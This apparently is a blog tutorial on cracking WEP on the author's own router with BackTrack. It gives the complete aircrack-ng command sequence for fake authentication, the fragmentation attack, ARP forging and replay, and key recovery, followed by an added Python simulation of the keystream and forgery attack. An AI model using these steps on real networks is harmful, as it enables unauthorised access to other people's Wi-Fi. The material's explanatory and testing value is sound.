In case you weren’t aware, securing your home network with WEP is a bit like putting a sign on your front door telling everyone that you do keep it locked, along with a clue to where the key is. And then leaving the key under the mat.
I’ve tried cracking WEP before with limited success: relying on the network being busy enough to capture packets doesn’t make for reliable cracking. This method is different, because it forces the access point to produce all the packets we need for analysis. I thought it was time I finally proved to myself that it was possible, so I dug out the old BT Homehub, switched on the wireless, and booted my MacBook Pro off an excellent pen test Live CD, BackTrack.
All you need is a machine with a wireless card, the BackTrack CD, the MAC address of your target access point, the SSID (the network “name”) and the MAC address of your wireless card.
Once booted, here are the steps I took to obtain the WEP key for the network:
airmon-ng start wifi0 11
wlanconfig ath0 destroy
export AP=00:14:7F:95:5B:AC      # access point MAC
export WIFI=00:14:51:XX:XX:XX    # WLAN card MAC
export SSID=BTHomeHub-1100       # SSID of target network
ifconfig ath1 up
iwconfig ath1 mode Monitor channel 11
aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI ath1
At this point you should see an “Association Successful!” message (the fake authentication has worked, so the access point will now accept frames from your card’s MAC). You can continue with the fragmentation attack:
aireplay-ng -5 -b $AP -h $WIFI ath1
You’ll now have to wait until aireplay returns with a packet it has found; when it asks whether to use it, say yes. The result is saved to a fragment.xor file, which holds the recovered keystream for that packet’s IV (not the WEP key itself). That keystream is enough to encrypt a packet of our own without knowing the key, so you can use the .xor file to forge the packet we’re going to throw at the access point:
packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w arp-request
This will write a forged, encrypted ARP request to the file arp-request (the -k and -l options set the destination and source IP to 255.255.255.255 so the access point will re-broadcast it). Now, time to start capturing the packets we’re going to analyse:
airodump-ng -c 11 --bssid $AP --ivs -w cap ath1
In a new console, start throwing the arp-request packet out to the access point:
aireplay-ng -2 -r arp-request ath1
When it reads our packet from the file, say yes and it will start replaying it continuously. Every replay makes the access point re-broadcast the ARP request with a fresh IV, so you should see the data count in the airodump window skyrocket. Once you’ve got approximately 70000 data packets in the airodump window, start another console (airodump and aireplay can keep running) and run:
aircrack-ng -n 64 -b $AP *.ivs
This does the work of cracking the key from the captured IVs (-n 64 tells it to try a 64-bit key). After a while (less than a minute for me) it will hopefully spit out something like the following:
Job done. Told you WEP was easy.
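To show what is really going on inside the aireplay-ng -5 and packetforge-ng steps above, here is an added Python model of the fragmentation attack. It is not code from the original post or from the aircrack-ng project; it strips WEP down to IV, key-id byte, RC4 and the CRC-32 ICV, with no 802.11 headers, and stands in a simplified access point that verifies each fragment, reassembles them and re-broadcasts the result under its own IV. The key, IVs, MAC address and packet contents are constructed for the demo. Starting from one captured frame whose first 8 bytes (the LLC/SNAP header) are known, it recovers 8 bytes of keystream, grows that to a full 1500-byte packet’s worth by bouncing chosen fragments off the access point, and then forges a broadcast ARP request that the access point decrypts cleanly, all without ever touching the key.

```python
"""WEP keystream recovery, fragmentation and frame forgery in miniature.

Added example, not code from the original post or from aircrack-ng. It models
what aireplay-ng -5 and packetforge-ng do: recover RC4 keystream for one IV
from a frame whose first bytes are known, grow it by bouncing fragments off
the access point, then encrypt an arbitrary payload with it. Key, IVs, MAC
and packet contents are constructed for the demo.
"""
import struct
import zlib

# Nearly every WEP data frame starts with an LLC/SNAP header: for IPv4 it is
# aa aa 03 00 00 00 08 00, for ARP aa aa 03 00 00 00 08 06. That is the known
# plaintext the attack relies on.
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")

DEMO_KEY = bytes.fromhex("0badc0ffee")   # constructed 40-bit ("64-bit") WEP key
DEMO_MAC = bytes.fromhex("001122334455")  # constructed attacker MAC
MAX_FRAGMENTS = 16                        # 802.11 allows at most 16 fragments per frame
MTU = 1500


def rc4_keystream(key, length):
    """Plain RC4: key scheduling, then `length` bytes of PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data):
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key, iv, plaintext):
    """Frame = IV || key-id byte || RC4(IV||key) XOR (plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key, frame):
    """Return the plaintext, or None if the ICV does not verify."""
    iv, body = frame[:3], frame[4:]
    plain = xor(body, rc4_keystream(iv + key, len(body)))
    data = plain[:-4]
    return data if icv(data) == plain[-4:] else None


def make_access_point(key):
    """Simulated AP: checks every fragment, reassembles, and re-broadcasts the
    whole frame under a fresh IV of its own. The attacker never sees `key`."""
    counter = [0]

    def relay(fragments):
        parts = []
        for frag in fragments:
            data = wep_decrypt(key, frag)
            if data is None:      # one wrong keystream byte and the burst is dropped
                return None
            parts.append(data)
        counter[0] += 1
        return wep_encrypt(key, struct.pack("<I", counter[0])[:3], b"".join(parts))

    return relay


# ---- attacker side: works only from captured frames and known plaintext ----

def recover_keystream(frame, known_plaintext):
    """Keystream for the frame's IV: ciphertext XOR known plaintext, byte for byte."""
    return frame[:3], xor(frame[4:], known_plaintext)


def forge_frame(iv, keystream, payload):
    """What packetforge-ng does with fragment.xor: encrypt with keystream, no key needed."""
    body = payload + icv(payload)
    if len(body) > len(keystream):
        raise ValueError("need %d keystream bytes, have %d" % (len(body), len(keystream)))
    return iv + b"\x00" + xor(body, keystream)


def fragmentation_round(iv, keystream, relay):
    """One round of aireplay-ng -5: split chosen plaintext into fragments small
    enough (data + 4-byte ICV) to encrypt with the keystream we already have,
    let the AP reassemble and relay them, then read a longer keystream off the
    relayed frame, since we know every byte of its plaintext."""
    chunk_max = len(keystream) - 4
    target = min(MTU, MAX_FRAGMENTS * chunk_max)
    n = -(-target // chunk_max)           # fragments needed (ceiling division)
    chunk = -(-target // n)
    plaintext = bytes((i * 7) & 0xFF for i in range(target))  # arbitrary but known
    frags = [forge_frame(iv, keystream, plaintext[k * chunk:(k + 1) * chunk]) for k in range(n)]
    relayed = relay(frags)
    if relayed is None:
        raise RuntimeError("AP rejected a fragment: the keystream is wrong")
    return recover_keystream(relayed, plaintext + icv(plaintext))


def run_attack(captured_frame, relay):
    """From one sniffed IP frame, grow keystream until it covers a full MTU packet."""
    iv, ks = recover_keystream(captured_frame, LLC_SNAP_IP)
    history = [len(ks)]
    while len(ks) < MTU + 4:
        iv, ks = fragmentation_round(iv, ks, relay)
        history.append(len(ks))
    return iv, ks, history


def demo():
    relay = make_access_point(DEMO_KEY)
    # A victim's IPv4 frame we sniffed; only its first 8 bytes are assumed known.
    victim_packet = LLC_SNAP_IP + bytes.fromhex("4500003c1c46400040063b4ec0a80164c0a80101")
    captured = wep_encrypt(DEMO_KEY, b"\x12\x34\x56", victim_packet)
    iv, ks, history = run_attack(captured, relay)
    # Forge the broadcast ARP request packetforge-ng -0 builds (255.255.255.255 each way).
    arp = (LLC_SNAP_ARP + bytes.fromhex("0001080006040001") + DEMO_MAC
           + b"\xff\xff\xff\xff" + b"\x00" * 6 + b"\xff\xff\xff\xff")
    forged = forge_frame(iv, ks, arp)
    return history, wep_decrypt(DEMO_KEY, forged) == arp


if __name__ == "__main__":
    print(demo())
```

The keystream grows 8 to 68 to 1028 to 1504 bytes in three rounds (16 fragments of 4 bytes, 16 of 64, then 2 of 750), which is why the real fragmentation attack only needs a single sniffed data frame to get going. The forged ARP request passes the access point’s ICV check because the ICV is computed over our chosen plaintext and encrypted with genuine keystream; that is the packet aireplay-ng -2 replays to make the AP churn out new IVs for aircrack-ng.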